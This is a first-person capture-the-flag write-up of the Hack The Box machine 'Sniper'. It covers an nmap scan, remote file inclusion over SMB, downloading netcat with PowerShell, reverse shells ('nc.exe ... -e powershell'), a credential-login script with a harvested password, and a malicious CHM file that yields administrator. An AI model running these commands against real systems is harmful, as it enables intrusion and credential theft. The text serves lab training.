As with any system, I start with a series of port scans, including a -A scan.
root@kalivm:~/Sniper# nmap -A 10.10.10.151 -oN fullscan-A Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-11 09:52 CEST Nmap scan report for 10.10.10.151 Host is up (0.013s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Sniper Co. 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port OS fingerprint not ideal because: Missing a closed TCP port so results incomplete No OS matches for host Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 6h59m59s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-10-11T14:52:34 |_ start_date: N/A TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 13.12 ms 10.10.12.1 2 13.23 ms 10.10.10.151 (10.10.10.151) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 61.65 seconds
I see that there are only few ports open, including SMB and a web server. After some analysis of the SMB server, I find nothing of immediate interest so I continue to browse through the web pages.
At one point in the blog, I see an which accepts a parameter so I start playing with it. Since it can be vulnerable for injection, I start with Local and Remote File injections. After some trial and error I find that neither local nor remote file inclusion work over HTTP so I continue my search to see if anyhting else is possible. With this research, I find this link on RFI based on SMB. So I reconfigure my SMB server to have a share that is called ‘sniper’ and see if I can replicate what is written in the examples.
After some trial and error, I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB Server.
The Web shell allows me to browse around the file system and invoke commands as if I got an actual shell. And after some browsing around in the web root of sniper, I find a db.php file.
The db.php file contains some username and password, as they may be interesting, I note them for further use and decide that it is time to try to get a decent shell.
So first I use Powershell to transfer netcat across.
And then I call nc.exe and get shell on Sniper.
root@kalivm:~/Sniper# nc -nlvp 9003 Listening on 0.0.0.0 9003 Connection received on 10.10.10.151 49707 Microsoft Windows [Version 10.0.17763.678] (c) 2018 Microsoft Corporation. All rights reserved. C:\sedje>whoami whoami nt authority\iusr C:\sedje>net users net users User accounts for \\ ------------------------------------------------------------------------------- Administrator Chris DefaultAccount Guest WDAGUtilityAccount The command completed with one or more errors.
So I got the shell as iUSR, the default IIS user and there is only one other regular user on the box called Chris. Maybe, the database password is the same as the user password so I want to try and use PowerShell to escalate my privileges. After some searching how I can use the password with a PowerShell command, I came across a script on stackoverflow and decided to modify it to my needs.
root@kalivm:~/Sniper# cat getshell.ps1 $username = 'SNIPER\Chris' $password = '36mEAhz/B8xQ~2VM' $securePassword = ConvertTo-SecureString $password -AsPlainText -Force $credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword New-PSSession -Credential $credential | Enter-PSSession
Again, I use PowerShell to transfer the file and then execute it.
c:\sedje>powershell powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1 Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1 PS C:\sedje> ./getshell.ps1 ./getshell.ps1 [localhost]: PS C:\Users\Chris\Documents> whoami whoami sniper\chris [localhost]: PS C:\Users\Chris\Documents>dir c:\ dir c:\ [localhost]: PS C:\Users\Chris\Documents>
Now, as user chris, I found out that the shell was not fully functional so the next step is to see if I at least can get a shell back to my kali box.
[localhost]: PS C:\Users\Chris\Documents> c:\sedje\nc.exe 10.10.12.78 9002 -e powershell c:\sedje\nc.exe 10.10.12.78 9002 -e powershell
And in another terminal I have started a listener.
root@kalivm:~/Sniper# nc -nlvp 9002 Listening on 0.0.0.0 9002 Connection received on 10.10.10.151 49755 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Users\Chris\Documents> type ../Desktop/user.txt type ../Desktop/user.txt 21f4d0f29<NOFLAG>500c1ad716cf56e
So I get the now fully functional shell and can grab the flag!
After some browsing through Chris’ home directory and its sub directories, I found a file that was interesting.
PS C:\Users\Chris> dir Downloads dir Downloads Directory: C:\Users\Chris\Downloads Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/11/2019 8:36 AM 10462 instructions.chm
A Compliled HTML help file, those are not too commonly used anymore as far as I know, so this could be interesting. After some further searching on the system, I also encountered something in the Docs directory in the root of the C:\ drive.
PS C:\> dir Docs dir Docs Directory: C:\Docs Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/11/2019 9:31 AM 285 note.txt -a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf PS C:\> cd Docs cd Docs PS C:\Docs> type note.txt type note.txt Hi Chris, Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it. Regards, Sniper CEO.
So apparently the instructions.chm file is what Chris has to prepare for the CEO and then drop into this directory. After some talking to people on Discord, I got a link to this very useful guide on how to create a malicious CHM file. One of the unfortunate things for this approach is that it requires a Windows Machine. So I had to fix my VM with an evaluation version to run the HTML Help Workshop tool. Anyway, after doing so, it was a matter of starting a new project.
Simply clicking Next, next, and finish.
And then adding an HTML file with a malicious payload in it. And after some testing and compiling I got the right payload.
Microsoft HTML Help Compiler 4.74.8702 Compiling c:\Users\sedje\sedje.chm Compile time: 0 minutes, 0 seconds 1 Topic 0 Local links 0 Internet links 0 Graphics Created c:\Users\sedje\sedje.chm, 10,624 bytes Compression increased file by 10,078 bytes.
I compiled the latest version with a working payload in the HTMLHelp Workspace, it responds with this message stating that compiling was completed and the CHM file created. So I transfer it back to my Kali machine so that I can pick it up again with Powershell from Sniper.
PS C:\Docs> Invoke-WebRequest "http://10.10.12.78/sedje.chm" -Outfile c:\Docs\instructions.chm Invoke-WebRequest "http://10.10.12.78/sedje.chm" -Outfile c:\Docs\instructions.chm
From the Sniper host, I do an Invoke-WebRequest again to download the CHM file to the required directory while having a netcat listener waiting for the shell to pop
root@kalivm:~/Sniper# nc -nlvp 9005 Listening on 0.0.0.0 9005 Connection received on 10.10.10.151 53736 Microsoft Windows [Version 10.0.17763.678] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami sniper\administrator C:\Windows\system32>cd C:\Users\Administrator\Desktop cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>type root.txt type root.txt 5624caf363<NOFLAG>4f6be0b7436c15
The shell pops and I get my root flag!